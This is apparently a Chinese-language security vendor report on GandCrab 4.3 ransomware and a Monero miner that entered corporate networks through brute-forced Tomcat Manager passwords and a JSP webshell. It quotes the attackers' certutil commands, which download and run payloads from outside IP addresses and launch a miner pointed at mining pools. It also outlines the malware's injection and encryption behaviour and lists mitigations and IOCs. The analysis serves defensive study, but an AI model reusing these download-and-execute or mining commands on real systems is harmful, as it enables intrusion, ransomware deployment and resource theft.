爆破Tomcat伺服器,GandCrab 4.3勒索病毒成功入侵企業內網
前言
近日,騰訊御見威脅情報中心攔截到專攻企業區域網的勒索病毒GandCrab,這個臭名昭著的勒索病毒版本號已升級到4.3。與以往不同的是,攻擊者在已入侵網路同時釋放挖礦木馬和勒索病毒,針對高價值目標使用GandCrab勒索病毒,而一般目標則執行挖礦木馬,以最大限度利用被入侵的目標網路非法牟利。
一、概述
分析勒索病毒GandCrab 4.3的入侵通道,發現是黑客通過暴力破解Tomcat 伺服器弱密碼實現入侵。入侵成功後,從C2伺服器下載勒索病毒和挖礦木馬,恢復被GandCrab勒索病毒加密的檔案需要付費499美元購買解密工具。通過錢包分析發現,該木馬已收穫18.6個門羅幣,摺合人民幣約1.5萬元。
GandCrab 勒索病毒之前的版本一般通過釣魚郵件和水坑攻擊(選擇最可能接近目標的網路部署陷阱檔案,等待目標網路內的主機下載)。而現在,御見威脅情報中心監測到越來越多的勒索病毒會首先從企業Web伺服器下手,其中Tomcat被爆破弱密碼攻擊的情況近期有明顯上升。
攻擊一旦得手,黑客就會以此為跳板,繼續向內網擴散。擴散的手法,往往是使用NSA攻擊工具包或1433,3389埠暴力破解弱口令。之後,黑客會選擇高價值目標下載執行勒索病毒,對一般系統,則植入挖礦木馬獲利。
通過詳細技術分析發現本次入侵具有如下特點:
通過Tomcat Manager後臺弱口令爆破攻擊;
病毒使用NSIS打包,病毒檔案包中還有若干張美國總統特朗普的照片,猜測其意圖是釋放到資料夾中迷惑受害者;
GandCrab勒索病毒V4使用salsa20的加密方式;
病毒僅排除幾個系統目錄和配置檔案不加密,其他檔案均會被加密,被加密的檔案後輟為KRAB;
受害者須使用TOR瀏覽器登入暗網購買解密工具;
入侵者內網釋放init.exe礦機挖門羅幣。
二、影響評級-高危
黑客首先會入侵企業Web伺服器,之後再以此為跳板在內網釋放勒索病毒和挖礦木馬。除個別資料夾外,都被加密,除非得到金鑰,受損檔案無法解密還原。
三、入侵分析
Tomcat 伺服器是一個免費的開放原始碼的Web 應用伺服器,屬於輕量級應用伺服器,在中小型系統和併發訪問使用者不是很多的場合下被普遍使用,Tomcat 5支援最新的Servlet 2.4 和JSP 2.0 規範。因為Tomcat 技術先進、效能穩定,而且免費,因而深受Java 愛好者的喜愛並得到了部分軟體開發商的認可,成為目前比較流行的Web 應用伺服器。
Tomcat提供了一個應用:manager,訪問這個應用需要使用者名稱和密碼,使用者名稱和密碼儲存在一個xml檔案中。通過這個應用,輔助於Ftp,可以在遠端通過Web部署和撤銷應用。
通過此次受害者暴露在外網上的web日誌發現。此次入侵通過Tomcat Manager後臺弱口令進行爆破,爆破成功後,黑客上傳了一個war包(jexws3.war),該war包中包含了一個Jsp webshell(jexws3.jsp),並且該webshell擁有最高許可權。黑客通過Jsp webshell執行如下命令:
cmd.exe /c certutil.exe -urlcache -split -f <a href="http://85.192.92.5/info.exe">http://85.192.92.5/info.exe</a> %TEMP%/st.exe&cmd.exe /c %TEMP%:/st.exe
四、勒索分析
黑客入侵成功執行命令後會從85.192.92.5地址下載info.exe,該檔案為使用NSIS打包的GandCrab v4.3版本的勒索病毒,GandCrab勒索病毒自4.0開始使用salsa20加密方式,有一定概率能解密,但依然難度很大。若無備份進行恢復,又無法解密,會給企業帶來重大損失。
安裝包執行後會拉起msiexec程序並向其中寫入惡意程式碼執行,使用白程序執行惡意PayLoad的方式一定程度上也增加了勒索病毒的隱蔽性。
病毒母體為NSIS安裝包:
安裝包執行後啟拷貝自身到Roaming目錄執行然後動命令延時自刪除:
Roaming目錄病毒副本:
病毒副本掛起方式啟動msiexec程序並寫入Shellcode/">Shellcode:
遠執行緒執行注入msiexec程序Shellcode:
Shellcode動態獲取要使用的API:
Shllocde設定病毒登錄檔啟動項:
然後從記憶體中解密出病毒PayLoad執行:
觀察PayLoad明文可知病毒版本為v4.3版本:
病毒獲取安全軟體資訊:
獲取機器資訊:
結束大量檔案佔用程序:
判斷不加密檔案:
desktop.ini autorun.inf ntuser.dat iconcache.db bootsect.bak boot.ini ntuser.dat.log thumbs.db KRAB-DECRYPT.html KRAB-DECRYPT.txt CRAB-DECRYPT.txt ntldr NTDETECT.COM Bootfont.bin
不加密目錄:
\ProgramData\ \IETldCache\ \Boot\ \Program Files\ \Tor Browser\ \All Users\ \Local Settings\ \Windows\
判斷不加密機器國家語言:
422(烏克蘭) 423(比利時) 428(塔吉克) 42c(亞塞拜然) 437(喬治亞) 43f(吉爾吉斯坦) 440(吉爾吉斯斯坦) 442(土庫曼) 443(烏茲別克) 444(韃靼斯坦) 818(未知) 819(未知) 82c(亞塞拜然) 843(烏茲別克)
最後加密檔案新增擴充套件字尾KRAB,並留言使用TOR瀏覽器進一步訪問地址獲取解密資訊:
TOR 登入地址 ofollow" rel="nofollow,noindex" target="_blank">http://gandcrabmfe6mnef.onion/2f7a3eb776b9c9c2 可知勒索者要求支付499美元的比特幣或達世幣購買解密工具
五、挖礦分析
在暴露的web日誌中,發現在執行下載GandCrab後,通過jsp webshell又下載了其他樣本,分析後發現下載的為開源礦機。
下載命令:
certutil.exe -urlcache -split -f " http://54.39.10.62:3000/init.exe " init.exe && START /B init.exe -r 500 -R 35 --donate-level 0 -o 139.162.15.153:3333 -u x -p x -k --nicehash -B
wsservice.exe -o pool.supportxmr.com:80 -u 42eDSCYj6uV45bETiPafUw4vabGZnCeCXAyJijh6LbvHYrvk6QC4VXeYmZUiP6ndemKPobHUt4n Dx19JdbWcUoZtHiML6du -p windows -k --donate-level=1
目前收益:
受害者使用者包含一些企業網站伺服器和學校網站伺服器。
六、解決方案
調整Tomcat後臺管理設定:修改管理後臺預設頁面路徑,設定白名單限制登入,修改弱口令密碼,避免服務執行高許可權。
儘量關閉不必要的埠,如:445、135,139等,對3389埠可進行白名單配置,只允許白名單內的IP連線登陸。
儘量關閉不必要的檔案共享,如有需要,請使用ACL和強密碼保護來限制訪問許可權,禁用對共享資料夾的匿名訪問。
採用高強度的密碼,避免使用弱口令密碼,並定期更換密碼。建議伺服器密碼使用高強度且無規律密碼,並且強制要求每個伺服器使用不同密碼管理。
對沒有互聯需求的伺服器/工作站內部訪問設定相應控制,避免可連外網伺服器被攻擊後作為跳板進一步攻擊其他伺服器。
建議全網安裝終端安全管理系統(如騰訊 御點: https://s.tencent.com/product/yd/index.html )。
IOC/">IOC
URL:
http://85.192.92.5/default.exe
http://54.39.10.62:3000/init.exe
IP:
85.192.92.5 159.65.34.71 54.39.10.62 159.203.40.183 193.169.252.253 18.188.135.187
MD5:
35fadb783458c2c49f06ac6991362ec1 79efae89df0da2f395843007889c6ba3 f18b892c15af71b3cfd2b33dae1016ba
*本文作者:騰訊電腦管家,轉載請註明來自FreeBuf.COM